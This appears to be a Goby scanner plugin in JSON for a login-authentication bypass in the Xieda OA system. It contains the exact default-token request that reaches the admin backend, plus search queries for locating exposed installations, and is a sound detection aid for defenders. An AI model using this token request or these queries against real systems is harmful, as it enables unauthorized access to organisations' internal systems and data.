Goby/json/Xieda-OA-system-bypasses-lo...

101 lines
2.9 KiB
JSON
Raw Normal View History

2022-11-25 02:08:58 -08:00
{
"Name": "Xieda OA system bypasses login authentication",
"Description": "<p>Xieda OA has a login authentication bypass vulnerability. Attackers use the default token to log in to the system background. <br></p>",
"Product": "Xieda OA System",
"Homepage": "http://www.ctop.cn/",
"DisclosureDate": "2021-12-01",
"Author": "learnupup@gmail.com",
"FofaQuery": "body=\"/interface/CheckLoginName.jsp\"",
"GobyQuery": "body=\"/interface/CheckLoginName.jsp\"",
"Level": "2",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">The attacker uses the default token to log in to the system background. </span><br></p>",
"Recommendation": "<p>1. Pay attention to the patch released by the manufacturer: <a href=\"http://www.ctop.cn/\">http://www.ctop.cn/</a></p><p> 2. Delete the default token</p>",
"Translation": {
"CN": {
"Name": "协达OA系统绕过登录认证登陆后台",
"Product": "协达OA系统",
"Description": "<p>协达OA系统是一款全面先进的OA系统</p><p>协达 OA 存在登录认证绕过漏洞攻击者利用默认的token登陆系统后台。<br></p>",
"Impact": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">攻击者利用默认的token登陆系统后台获取敏感信息进一步控制服务器。</span><br></p>",
"Recommendation": "<p>1、关注厂商发布补丁<a href=\"http://www.ctop.cn/\">http://www.ctop.cn/</a></p><p>2、删除默认token</p>",
"VulType": [
"权限绕过"
],
"Tags": [
"权限绕过"
]
}
},
"References": [],
"Is0day": false,
"HasExp": false,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/stylei/MainPage.jsp?token=YXR-YMD-SYQ-TOKEN",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "OA系统",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "我的桌面",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": null,
"Tags": [
"Permission bypass"
],
"VulType": [
"Permission bypass"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "7.5",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}